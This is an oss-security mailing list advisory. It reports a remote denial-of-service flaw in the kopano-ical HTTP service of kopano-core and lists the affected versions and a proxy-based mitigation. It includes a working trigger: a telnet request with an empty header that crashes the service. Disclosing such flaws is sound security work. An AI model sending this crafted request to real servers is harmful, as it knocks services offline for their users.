Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <op516nqr-96s1-3r69-4np9-314p89o96951@vanv.qr>
Date: Fri, 2 Apr 2021 10:26:29 +0200 (CEST)
From: Jan Engelhardt <jengelh@...i.de>
To: oss-security@...ts.openwall.com
Subject: kopano-core 11.0.1.77: Remote DoS with out-of-bounds access

Initial publication, no CVE number yet.

# Affected versions

  * kopano-core 11.0.1
  * kopano-core 8.7.20
  * it is believed this affects all other versions too,
    including 10.0.7, 9.1.0, and zarafa 7.2.6.

The "kopano-ical" program implements a network service/trivial HTTP 
server. It fails to properly check HTTP headers, and with a crafted 
request, can be exploited to drive the process into an exception and 
have it terminate.


# Trigger

» ./kopano-ical -F &
» telnet localhost 8000
Trying ::1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.0
Foo:
Connection closed by foreign host.
terminate called after throwing an instance of 'std::out_of_range'
  what():  basic_string::substr: __pos (which is 6) > this->size() (which is 5)


# Mitigation

In conjunction with a proxy, the issue does not occur as they often 
filter lines (LF->CRLF, giving an extra byte). Tested ones: 
nginx-1.19.8 squid-4.14 apache2-2.4.46 tinyproxy-1.10.0

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.